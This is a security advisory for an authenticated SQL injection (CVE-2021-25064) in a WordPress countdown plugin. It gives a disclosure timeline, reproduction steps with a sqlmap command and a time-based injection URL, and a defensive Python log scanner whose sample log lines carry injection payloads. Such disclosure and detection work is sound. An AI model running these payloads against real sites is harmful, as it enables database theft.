CVE-2021-25064 SQL Injection vulnerability in Wow Countdowns 3.1.1 WordPress Plugin

CVE-2021-25064

CVSS: Pending

https://wordpress.org/plugins/mwp-countdown/

https://wpscan.com/vulnerability/30c70315-3c17-41f0-a12f-7e3f793e259c

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25064

Disclosure Timeline

Dec 10, 2021: Issue identified and disclosed to WPScan (#5662); received an automatic reply

Dec 14, 2021: Received an update that the vendor had been contacted; CVE-2021-25064 assigned

Dec 15, 2021: Plugin version updated

Dec 22, 2021: CVE-2021-25064 assigned

January 18, 2022: Plugin closed

March 28, 2022: CVE published in NVD

Description:

The Wow Countdowns plugin does not sanitize the 'did' parameter before using it in a SQL statement, leading to an authenticated SQL injection.

The problematic code can be seen in \admin\partials\main.php

This vulnerability is present in the current version of the plugin, 3.1.1. Administrative access is required to reach the vulnerable functionality.

Link to plugin:

https://wordpress.org/plugins/mwp-countdown/

Steps to reproduce:

1. Log into WordPress as the admin user.
2. Install the Wow Countdowns plugin.
3. In the plugin settings, create and publish a new countdown.
4. Click the delete link, then capture and save the request in an intercepting proxy.
5. Save the request to a file, request.txt.
6. Run sqlmap:

sqlmap -r request.txt --dbms=mysql --current-user -p did --batch --flush-session

Or

https://test0.local/wp-admin/admin.php?page=mwp-countdown&info=del&did=1 AND (SELECT 5382 FROM SELECT(SLEEP(5)))PpNt)

Using this technique, an attacker with an administrator account can dump the entire contents of the database, including the WordPress users table.
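The root cause above is a numeric id that reaches a SQL statement without being constrained to an integer. From the defender's side, the same observation gives both the fix and a detection: a countdown id is only ever a plain decimal number, so any other value in 'did' on the delete action is worth flagging. The script below is an added example written for this advisory; it is not the plugin's code and not from the original report. The web-server log lines are constructed (the second one reuses the time-based payload from the reproduction URL above), and the function names (parse_line, normalise_did, find_suspicious_deletes) are this example's own.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (Apache common-log style, not real traffic).
# Lines 2 and 3 carry SQL fragments in the 'did' parameter of the countdown
# delete action; lines 1 and 4 are benign admin requests.
SAMPLE_LOG = """\
10.0.0.5 - - [15/Dec/2021:10:01:02 +0000] "GET /wp-admin/admin.php?page=mwp-countdown&info=del&did=7 HTTP/1.1" 302 0
10.0.0.9 - - [15/Dec/2021:10:03:11 +0000] "GET /wp-admin/admin.php?page=mwp-countdown&info=del&did=1%20AND%20(SELECT%205382%20FROM%20SELECT(SLEEP(5)))PpNt) HTTP/1.1" 200 4121
10.0.0.9 - - [15/Dec/2021:10:03:19 +0000] "GET /wp-admin/admin.php?page=mwp-countdown&info=del&did=1'%20OR%20'1'%3D'1 HTTP/1.1" 200 4121
10.0.0.5 - - [15/Dec/2021:10:05:40 +0000] "GET /wp-admin/admin.php?page=mwp-countdown HTTP/1.1" 200 5020
"""

# Minimal parser for the common-log prefix: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Return the fields of one log line as a dict, or None if the line does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def normalise_did(value):
    """Allow-list check mirroring the fix a plugin should apply before building SQL:
    a countdown id is a plain decimal string and nothing else. Returns the int, or
    None for anything that is not purely ASCII digits (every injection payload
    fails this test, whatever quoting or encoding it uses)."""
    return int(value) if re.fullmatch(r"[0-9]+", value) else None


def find_suspicious_deletes(log_text):
    """Scan log text for mwp-countdown delete requests whose 'did' is not a plain id."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        url = urlsplit(rec["target"])
        if not url.path.endswith("/wp-admin/admin.php"):
            continue
        # parse_qs percent-decodes the values, so %20 / %3D become the characters
        # the database would actually have seen.
        qs = parse_qs(url.query, keep_blank_values=True)
        if qs.get("page") != ["mwp-countdown"] or qs.get("info") != ["del"]:
            continue
        for did in qs.get("did", []):
            if normalise_did(did) is None:
                findings.append(
                    {"ip": rec["ip"], "ts": rec["ts"], "status": rec["status"], "did": did}
                )
    return findings


if __name__ == "__main__":
    for f in find_suspicious_deletes(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} status={f['status']} did={f['did']!r}")
```

Run against the constructed log it reports the two requests from 10.0.0.9 and nothing else. On a real site the same check can be pointed at the web-server access log or at a WAF's request log; because it keys on the parameter's shape rather than on SQL keywords, it also catches obfuscated variants. Inside a WordPress plugin the equivalent hardening is to coerce the id with absint() and to pass it through $wpdb->prepare() rather than concatenating it into the query string, which removes the injection regardless of what the request contains.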